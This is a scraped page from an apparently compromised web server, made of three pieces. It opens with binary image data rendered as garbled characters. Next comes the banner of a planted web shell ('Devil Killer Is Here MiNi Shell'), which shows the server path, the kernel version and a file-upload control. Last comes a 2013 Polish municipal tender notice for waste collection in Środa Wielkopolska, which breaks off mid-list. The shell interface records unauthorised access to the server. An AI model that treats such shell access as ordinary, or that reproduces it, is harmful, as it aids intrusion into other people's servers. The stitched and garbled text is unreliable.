JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130528/92575-N-2013.html

<p class="kh_header"><b>Środa Wielkopolska: Odbiór odpadów komunalnych zmieszanych i selektywnych zebranych od właścicieli nieruchomości zamieszkałych na terenie Miasta i Gminy Środa Wielkopolska</b><br>
<b>Numer ogłoszenia: 92575 - 2013; data zamieszczenia: 28.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Środzie Wlkp. , ul. Ignacego Daszyńskiego 5, 63-000 Środa Wielkopolska, woj. wielkopolskie, tel. 061 2867700, faks 061 2867702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sroda.wlkp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór odpadów komunalnych zmieszanych i selektywnych zebranych od właścicieli nieruchomości zamieszkałych na terenie Miasta i Gminy Środa Wielkopolska.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy zakres świadczenia usługi odbierania odpadów komunalnych od właścicieli nieruchomości zamieszkałych znajduje się w Regulaminie utrzymania czystości i porządku na terenie Gminy Środa Wielkopolska będący załącznikiem nr  10 do SIWZ.
1) Ilość odpadów komunalnych do odbioru:
Na podstawie sprawozdań ustala się, że z terenu Gminy Środa Wielkopolska, w okresie  12 miesięcy  odebrano 8.000,00 Mg ( ton ) odpadów komunalnych zmieszanych i 800,00 Mg (ton) selektywnie zebranych.
W związku z powyższym przewiduje się, że w okresie 6 miesięcy( termin realizacji zamówienia publicznego) zostanie odebranych  4000,00 Mg ( ton)  odpadów komunalnych zmieszanych i 400,00 Mg (ton) odpadów selektywnie zebranych.
U w a g a: 
Zamawiający nie zapewnia realizacji zamówienia w podanych powyżej ilościach, stanowią one jedynie przybliżone dane poglądowe wynikające z lat poprzednich;
Rozliczenie z wykonawcą będzie następowało na podstawie zaproponowanej ceny  ryczałtowej  za całość zamówienia określonej  w Formularzu ofertowym  nr 1  stanowiącym załącznik do SIWZ płatnych w miesięcznych ratach. 
2) Odbiór wskazanych w opisie zamówienia rodzajów odpadów komunalnych od właścicieli nieruchomości zamieszkałych w Gminie Środa Wielkopolska.

Wykonawca  jest  zobowiązany  do  odebrania   niżej  opisanych  odpadów  komunalnych z nieruchomości zamieszkałych na terenie Gminy Środa Wielkopolska.
a) Niesegregowane (zmieszane) odpady komunalne
Kody odpadów:
20 03 01 - niesegregowane odpady komunalne

System odbioru odpadów:
Zabudowa jednorodzinna: pojemnikowy.
Zabudowa wielorodzinna: kontenerowo - pojemnikowy.

Rodzaj pojemników do gromadzenia zmieszanych odpadów  komunalnych: 
Zabudowa jednorodzinna: 110 l [0,11 m3]; 120 l [0,12 m3]; 240 l [0,24 m3], 360 l [ 0,36 ], 1100 l     [ 1,1 m3 ]
Zabudowa wielorodzinna: 240 l [0,24 m3]; 360 l [0,36 m3];  1100 l [1,1 m3]; 
6000 l  [ 6 m3 ];
Pojemniki oraz kontenery na odpady zmieszane zapewnia Właściciel posesji.
b) Odpady wtórne - odpady selektywnie zbierane u źródła - składowane do jednego pojemnika lub worka -  kod 20 01 99
Kody odpadów:
15 01 01 - opakowania z tektury i papieru
15 01 02 - opakowania z tworzyw sztucznych
15 01 04 - opakowania z metali
15 01 07 - opakowania ze szkła
20 01 01 - papier i tektura
20 01 02 - szkło
20 01 39 - tworzywa sztuczne
20 01 40 - metale
20 01 10 - odzież
20 01 11 - tekstylia

c) Na terenie zabudowy jednorodzinnej  do zbiórki odpadów wtórnych będzie prowadzony system workowy.
Natomiast na terenie zabudowy wielorodzinnej ustawione zostaną pojemniki odpowiednio opisane do zbiórki odpadów wtórnych. 
Pojemniki do zbiórki odpadów wtórnych  i worki zapewnia Zamawiający.

Wykonawca zobowiązany jest do przekazania otrzymanych pojemników i worków do właścicieli nieruchomości zamieszkałych od których odbiera się odpady wtórne. Wyposażenie w worki nastąpi w dniu odbierania odpadów selektywnie zbieranych. Ilość dostarczonych worków ma być odpowiednia do ilości wystawionych worków. Przed pierwszym odbiorem odpadów wtórnych Wykonawca wyposaży ww. nieruchomość w co najmniej dwa worki na  odpady zbierane w sposób selektywny. 

Z uwagi na duże oddziaływanie na środowisko naturalne, Zamawiający wymaga aby usługa odbioru odpadów komunalnych zmieszanych i komunalnych selektywnie zbieranych odbywała się zgodnie z obowiązującymi przepisami.

d) Częstotliwość odbioru odpadów zmieszanych i wtórnych:
- w zabudowie jednorodzinnej -  1 raz na 2 tygodnie,
- w zabudowie wielorodzinnej - sukcesywnie po zapełnieniu pojemnika jednak nie rzadziej niż        1 raz na 2 tygodnie, zgodnie z harmonogramem wywozu ustalonym przez Zamawiającego ;

Wykonawca zobowiązany będzie do odbioru odpadów z wszystkich nieruchomości zamieszkałych, także tych które powstaną w trakcie realizacji umowy.

Załącznikami do SIWZ są: 
-Wykaz ilościowy mieszkańców w mieście - załącznik nr 8
-Wykaz ilościowy mieszkańców na wsi - załącznik nr 9
 - Regulamin Utrzymania czystości i porządku na terenie Gminy Środa Wielkopolska -    załącznik nr 10


3) Ustalenia organizacyjne związane z wykonaniem zamówienia i wymagania stawiane Wykonawcy:
a)Harmonogram wywozu odpadów Zamawiający sporządza jednorazowo w okresie wykonywania niniejszego zamówienia  we własnym zakresie i na własny koszt i przekazuje właścicielom nieruchomości  oraz wykonawcy w terminie do 28 czerwca 2013 r.   Za opracowanie, przygotowanie i dystrybucję harmonogramu wywozu odpadów Zamawiający obciąży Wykonawcę  kwotą 0,20 zł  netto od każdej osoby zameldowanej na terenie miasta i  gminy Środa Wielkopolska na podstawie faktury wystawionej przez zamawiającego, płatnej w terminie 14 dni od jej dostarczenia Wykonawcy.
Zamawiający informuje , że na terenie gminy Środa Wielkopolska  zameldowanych  było 31 090 osób (stan na 31.03.2013 r). Zamawiający wystawi fakturę zgodnie z stanem osób zameldowanych  na  dzień 31.03.2013 r.  
W przypadku zmiany harmonogramu nie będzie naliczana dodatkowa opłata. 

b)Wymogi dotyczące przekazywania odebranych odpadów:
Wykonawca zobowiązany jest do transportu odebranych  odpadów komunalnych zmieszanych   do regionalnej instalacji przetwarzania odpadów komunalnych wskazanej w uchwale Nr XXV/441/12 Sejmiku Województwa Wielkopolskiego z dnia 27 sierpnia 2012 r. w sprawie wykonania Planu Gospodarki Odpadami dla województwa wielkopolskiego na lata 2012-2017, tj. do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych ZGO w Witaszyczkach 1A, gmina Jarocin  lub do stacji przeładunkowej wchodzącej w skład RIPOK w Jarocinie a w przypadku gdy znajdująca się w nim instalacja ulegnie awarii lub nie może przyjmować odpadów z innych przyczyn to do instalacji zastępczych.

Odpady selektywnie zbierane przez Wykonawcę  należy dostarczyć do Bazy magazynowo transportowej , która znajduje się w miejscowości Pławce 5A gm. Środa Wielkopolska 

4) Szczegółowe wymagania stawiane wykonawcy odbierającemu odpady komunalne od właścicieli   nieruchomości zamieszkałych oraz standard sanitarny wykonywania usług oraz ochrony środowiska
a) Do obowiązków Wykonawcy w szczególności należy:
    Wykonywanie przedmiotu zamówienia zgodnie z obowiązującymi przepisami tj.:
-Ustawa z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r. poz. 21),
-Rozporządzenie Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013, poz. 122),
-Ustawa z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (tekst jednolity Dz. U. z 2012 r., poz. 391 ze zm.),
-Uchwała Nr XXXIII/596/2013 Rady Miejskiej w Środzie Wielkopolskiej z dnia 4 kwietnia 2013 roku w sprawie wprowadzenia Regulaminu utrzymania czystości i porządku na terenie gminy.
-Rozporządzenie Ministra Środowiska z dnia 15 maja 2012 r. w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystości ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz. U. z 2012 r., poz. 630), 
-Ustawa z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz. U. z 2008 r., Nr 25, poz. 150 z zm).. 

b) Wykonawca  zobowiązuje  się  do  wykonania  usługi  z  należytą  starannością,  rozumianą  jako staranność profesjonalisty w działalności objętej przedmiotem niniejszego zamówienia, w oparciu o aktualne unormowania prawne, zgodnie z obowiązującymi standardami oraz etyką  zawodową.

c) Wykonawca będzie wykonywał usługę stanowiącą przedmiot niniejszego zamówienia przy użyciu narzędzi i sprzętu spełniającego wymagania wynikające z obowiązujących polskich norm przenoszących normy europejskie i aprobat technicznych polskich bądź europejskich, utrzymania odpowiedniego stanu sanitarnego  pojazdów i urządzeń do odbierania odpadów komunalnych,  spełnienia  wymagań technicznych  dotyczących  wyposażenia  pojazdów  do  odbierania  odpadów  komunalnych; zapewnienie,  dla   właściwej  realizacji  przedmiotu  umowy,  przez  cały  czas  trwania  umowy dostatecznej  ilości  środków  technicznych,  gwarantujących  terminowe i  jakościowe  wykonania przedmiotu zamówienia.

d) Wykonawca zobowiązany jest na każdorazowe żądanie Zamawiającego udostępnić we wskazanym zakresie informacje z systemów GPS dotyczących wszystkich przejazdów pojazdów transportujących odpady z terenu miasta i gminy Środa Wielkopolska w zakresie: tras przejazdów każdego z pojazdów, miejsc zatrzymania pojazdów i wyładunku odpadów.
e) Wyposażenie własnych pracowników zajmujących się wywozem odpadów w odzież  ochronną z widocznym logo firmy oraz w identyfikatory, do dnia poprzedzającego  dzień rozpoczęcia świadczenia usługi. 
f) Wykonawca ponosi pełną odpowiedzialność wobec Zamawiającego i osób trzecich za szkody na mieniu i zdrowiu osób trzecich, powstałe podczas oraz w związku z realizacją przedmiotu umowy. Wykonawca jest obowiązany naprawiać lub ponosić koszty napraw (wg wyboru Zamawiającego) szkód  wyrządzonych w majątku Gminy i osób trzecich podczas wykonywania usługi wywozu odpadów   komunalnych  w  Gminie  (uszkodzenia  chodników,  punktów  składowania  odpadów, ogrodzeń, wjazdów, pojemników, kontenerów itp.).
g) Wykonawca jest zobowiązany do porządkowania terenu zanieczyszczonego odpadami i innymi zanieczyszczeniami wysypanymi z pojemników, kontenerów, worków, pojazdów w trakcie realizacji usługi wywozu. Zakazuje się Wykonawcy mieszania selektywnie zebranych odpadów komunalnych ze zmieszanymi odpadami komunalnymi odbieranymi od właścicieli nieruchomości zamieszkałych na terenie Gminy Środa Wielkopolska zabezpieczenia przewożonych odpadów przed wysypaniem na drogę;
h) Wykonawca zobowiązany jest do prowadzenia dokumentacji związanej z działalnością objętą zamówieniem  tj.  sporządzanie  oraz  przekazanie  Zamawiającemu  kwartalnych  sprawozdań w terminie do końca miesiąca następnego po kwartale, którego dotyczy, przygotowanych na wzorach określonych w Rozporządzeniu Ministra Środowiska z dnia 15 maja 2012 r. w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz. U. 2012 poz. 630).
i) Wykonawca zobowiązany jest do przedkładania zamawiającemu sprawozdań miesięcznych i kwartalnych zawierających informacje o :
    - masie poszczególnych odpadów komunalnych zmieszanych w Mg, 
   -  wykazie nieruchomości, z których zostały odebrane odpady komunalne, 
   -  ilości odpadów komunalnych selektywnie zebranych - surowców wtórnych , [Mg], 
Sprawozdanie miesięczne i kwartalne powinno zostać sporządzone zgodnie z Rozporządzeniem Ministra Środowiska z dnia 15 maja 2012 r. w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz. U. z 2012 r., poz. 630),
j) Wykonawca zobowiązany jest przedkładać Zamawiającemu miesięczne sprawozdania w terminie 10 dni od zakończenia miesiąca,
Wykonawca zobowiązany jest przedkładać Zamawiającemu kwartalne sprawozdania w terminie do końca miesiąca  następującego po kwartale, którego dotyczy,
k) Forma przedłożonego sprawozdania miesięcznego i kwartalnego:
   - 1 wersja papierowa zatwierdzona przez wykonawcę,
   - 1 wersja na nośniku danych w PDF bez zabezpieczeń i haseł.

l) Wykonawca będzie zobowiązany zainstalować na wskazanym mu stanowisku komputerowym, będącym własnością Zamawiającego legalne oprogramowanie umożliwiające bieżącą kontrolę pracy sprzętu wykorzystywanego przez Wykonawcę,
ł) Wykonawca  zobowiązany  jest  do  prowadzenia  i  przekazywania  co  miesiąc   Zamawiającemu ewidencji nieruchomości, z których zostały odebrane zmieszane i selektywnie zebrane odpady.
m) Zamawiający dostarczy wykonawcy harmonogram zgodnie z rozdziałem 3.3.2 pkt.3 lit. a) SIWZ odpłatnie do dnia  28 czerwca 2013 r. 
n) Usługa będzie wykonywana w dni robocze od poniedziałku do piątku w godzinach 
od 7:00 do 20:00.
W przypadku nie wywiązania się z harmonogramu odbioru odpadów w dni powszednie dopuszcza się ich odbiór w soboty w godzinach od  7:00 do 13:00.
o ) Zamawiający, w czasie trwania umowy, udostępni Wykonawcy niezwłocznie informacje  o:
- nieruchomościach nowo zgłoszonych, na których zamieszkują mieszkańcy 
-nieruchomościach zmieniających swój status użytkowania np. z nieruchomości zamieszkałej na nieruchomość, na której nie powstają odpady komunalne.

 p) Wykonawca w przypadku nowo zgłoszonej nieruchomości będzie odbierał odpady zgodnie z obowiązującym harmonogramem dla tej nieruchomości. Wykonawca zobowiązany jest dostarczyć właścicielowi nowej nieruchomości worki do odpadów segregowanych  (w przypadku segregacji).
r) Wykonawca zobowiązany jest do organizacji i prowadzenia przez okres realizacji zamówienia telefonicznego Punktu Obsługi Klienta poprzez udostępnienie połączenia telefonicznego dla właścicieli nieruchomości, w ramach którego będą oni mogli składać wnioski i skargi od poniedziałku do piątku  (poza dniami ustawowo wolnymi od pracy).w godzinach od 700 do 1500. Rozmowy będą obowiązkowo nagrywane (w postaci cyfrowej) i przechowywane przez okres realizacji usługi oraz 6 miesięcy po jej zakończeniu. Z wnoszonych wniosków i skarg, na żądanie zamawiającego sporządzany będzie raport, który przekazywany będzie Zamawiającemu wraz z cyfrowym zapisem przeprowadzonych rozmów telefonicznych (np. na płycie CD lub DVD). 
s) Wykonawca zobowiązany jest do udostępnienia każdorazowo osobom uprawnionym do kontroli  kompletu dokumentacji związanej z prowadzoną działalnością odbioru odpadów na terenie Gminy Środa Wielkopolska i złożenia wyjaśnień niezbędnych do przeprowadzenia przez Zamawiającego kontroli wykonania usług, którą Zamawiający może przeprowadzić w każdym czasie pracy Wykonawcy. Zamawiający sporządza protokół z kontroli.
t) udostępnienie bezpośredniego połączenia telefonicznego (telefon komórkowy) dyspozytora firmy odpowiedzialnego za realizację zadania z pracownikiem zamawiającego odpowiedzialnym za koordynowanie przedmiotu zamówienia
u)Wykonawca zobowiązany jest do odbioru odpadów komunalnych gromadzonych na terenie poszczególnych nieruchomości w pojemnikach o pojemności od 110 l do 6000 l i innych występujących na terenie gminy. Ponadto wykonawca zobowiązany jest do odbioru odpadów zebranych w sposób selektywny w workach 120 l z folii LDPE. Pojazdy wykonawcy w trakcie realizacji usługi odbioru odpadów komunalnych realizowanych na rzecz zamawiającego nie mogą jednocześnie odbierać odpadów komunalnych z nieruchomości niezamieszkałych, które nie są objęte gminnym systemem gospodarki odpadami

w) Świadczenia n/w usług dodatkowych:
 - przekazania właścicielom nieruchomości (którzy nie posiadają własnych pojemników) pojemników do zbiórki odpadów zmieszanych np. w formie użyczenia lub najmu, za który to najem przedsiębiorca będzie mógł pobierać opłatę bezpośrednio od właścicieli nieruchomości.
Wykonawca odbierający odpady zobowiązany jest  spełniać warunki rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 roku w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 roku, poz. 122),

Powierzchnia gminy: 270,4 km2.
Liczba mieszkańców gminy: 31 090 osób (stan na 31.03.2013 r).
Obecnie na terenie miasta mieszka 22 297 osób, natomiast na wsi  8 793 osoby.
ok. 15.000 osób mieszka w zabudowie wielorodzinnej i ok.15.000 osób w zabudowie jednorodzinnej.
Liczba posesji: 3641 szt.
- Miasto  2490 szt.
- Wieś    1151 szt.
 W posesjach wielorodzinnych znajduje się:
 -  52 szt. pojemników KP-6
 -  64 szt. pojemniki  1100
 - 16 szt. pojemników 240
 - 100 szt. pojemników 120         
Gmina liczy 38 sołectw: Annopole, Babin, Bieganowo, Brzezie, Brodowo, Czarne Piątkowo, Chudzice, Chwałkowo, Chocicza, Dębicz, Dębiczek, Jarosławiec, Januszewo, Janowo, Kijewo, Koszuty, Lorenka, Marianowo Brodowskie, Mączniki, Nadziejewo, Olszewo, Pławce, Połażejewo, Pierzchnica, Pętkowo, Romanowo, Rumiejki, Ruszkowo, Tadeuszewo, Starkówiec Piątkowski, Szlachcin, Trzebisławki, Topola, Ulejno, Winna Góra, Zielniczki, Zielniki, Żabikowo  ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówień uzupełniających o których mowa w art. 67 ust.1 pkt. 6 ustawy Prawo zamówień publicznych w wysokości nie większej niż 35% wartości zamówienia podstawowego polegającego na powtórzeniu  usługi tego samego rodzaju</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8, 90.50.00.00-2, 90.51.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia oferty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, którzy posiadają: 
-Wpis do działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości prowadzonego przez Burmistrza Miasta i Gminy Środa Wielkopolska
-Zezwolenie na transport odpadów wydane przez właściwy organ lub wpis do rejestru, o którym mowa w art. 49 ust. 1 zgodnie z ustawą o odpadach w zakresie  obejmującym co najmniej przedmiot zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji kiedy wykaże,  że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał lub wykonuje co najmniej: 
-1 usługę polegającą na wykonaniu lub wykonywaniu odbiorze odpadów komunalnych o łącznej masie minimum 1.500 Mg ( ton)   świadczone w sposób ciągły przez co najmniej 6 miesięcy wraz z załączeniem dowodów czy zostały wykonane lub są wykonywane należycie -  Wykaz należy sporządzić według załącznika nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje  wyposażeniem umożliwiającym odbieranie odpadów komunalnych
od właścicieli nieruchomości w ilości co najmniej:
-dwóch pojazdów specjalistycznych, przystosowanych do odbierania zmieszanych  odpadów komunalnych i wyposażonych  oraz
-dwóch  pojazdów, przystosowanych do odbierania selektywnie zebranych odpadów komunalnych oraz 
-jednego pojazdu przystosowanego do odbierania odpadów bez funkcji kompaktującej
Wykaz należy sporządzić zgodnie z załącznikiem nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>opłaconą polisę a w przypadku jej braku innego dokumentu potwierdzającego, że     wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej  działalności związanej z przedmiotem zamówienia, na sumę gwarancyjną nie mniejszą niż  100.000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
